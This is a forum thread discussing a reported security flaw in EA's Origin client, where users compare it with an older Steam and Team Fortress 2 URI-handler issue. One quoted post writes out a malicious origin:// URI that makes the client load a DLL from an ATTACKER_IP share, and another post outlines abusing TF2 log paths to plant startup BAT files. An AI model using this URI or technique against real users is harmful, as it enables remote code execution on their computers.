[quote]Rich Kulawiec was the first of a few of you to submit the news that researchers have demonstrated a pretty big security vulnerability in EA's Origin platform (the company's Steam competitor), which can be used to exploit local vulnerabilities on the computers of about 40 million Origin users. If you'd like to see the hack in action, there's a nice video. [/quote]
[url]http://www.techdirt.com/articles/20130318/01034122364/eas-troubles-keep-getting-worse-big-security-flaw-discovered-origin-platform.shtml[/url]
I could be misunderstanding here but doesn't Steam have this same issue?
[QUOTE=Chonch;39977340]I could be misunderstanding here but doesn't Steam have this same issue?[/QUOTE]
Sure did, pretty sure it still does.
This is why browsers ask before launching applications. Allowing it to launch the application on an untrusted website is like clicking "Yes" on a Windows User Account Control prompt for an application called virus.exe.
If you do it, you're kind of asking for it.
[QUOTE=Foxtrot200;39977633]This is why browsers ask before launching applications. Allowing it to launch the application on an untrusted website is like clicking "Yes" on a Windows User Account Control prompt for an application called virus.exe.
If you do it, you're kind of asking for it.[/QUOTE]
Unless you are one of the millions of people that have no idea what it means when they are clicking yes to that dialog.
[QUOTE]Behind the scenes, the EA platform uses the origin://LaunchGame/71503 link to activate the game. When a targeted user instead clicks on a URI such as origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll, the Origin client will load a Windows dynamic link library file of the attackers' choosing on the victim's computer.[/QUOTE]
so even online torrent sites can manipulate clients' computers to run malicious dll
Wow, that's a pretty solid write-up.
steam supports uri features, it does not however let you execute remote dll's
Steam had a likewise exploit, however this was fixed years ago.
But combined with having the right games, you could do about the same (only it wasn't this retardedly easy)
[QUOTE=Foxtrot200;39977633]This is why browsers ask before launching applications. Allowing it to launch the application on an untrusted website is like clicking "Yes" on a Windows User Account Control prompt for an application called virus.exe.
If you do it, you're kind of asking for it.[/QUOTE]
The thing is majority of people who are not aware of these kind of exploits like we are, will absentmindedly click yes. They just want to start the game as fast as possible.
[QUOTE=spkypwnsuall;39977601]Sure did, pretty sure it still does.[/QUOTE]
lol @ the disagrees. it still exists because it's a flaw with the game
[QUOTE=OldFusion;39977892]Steam had a likewise exploit, however this was fixed years ago.
But combined with having the right games, you could do about the same (only it wasn't this retardedly easy)[/QUOTE]
Uh no, a similar article was already posted already in SN. It said that a similar exploit was found in October. Of last year.
ReVuln has been doing some work when it comes to publishing this stuff, but the functionality is so ingrained into these services that it probably wont amount to much for a long time, especially when the biggest loopholes are in products on the platforms and not really the platforms themselves ( Steam, Origin ). Most browsers have protection for this sort of thing in the form of a dialog, but there are other vectors.
The bug with Steam was not actually with Steam, it was with TF2. You could use a steam:// URL to pass a parameter to TF2 to make it change the name and location of its log file to anywhere on the system (including the startup folders). Combining that with forcing TF2 to launch and connect to an appropriately configured server you could make TF2 write malicious BAT files to startup and from there more havoc would be caused.
This is an exploit in the Origin client itself which allows it to directly execute malicious DLLs from anywhere on the internet.
Sorry, you need to Log In to post a reply to this thread.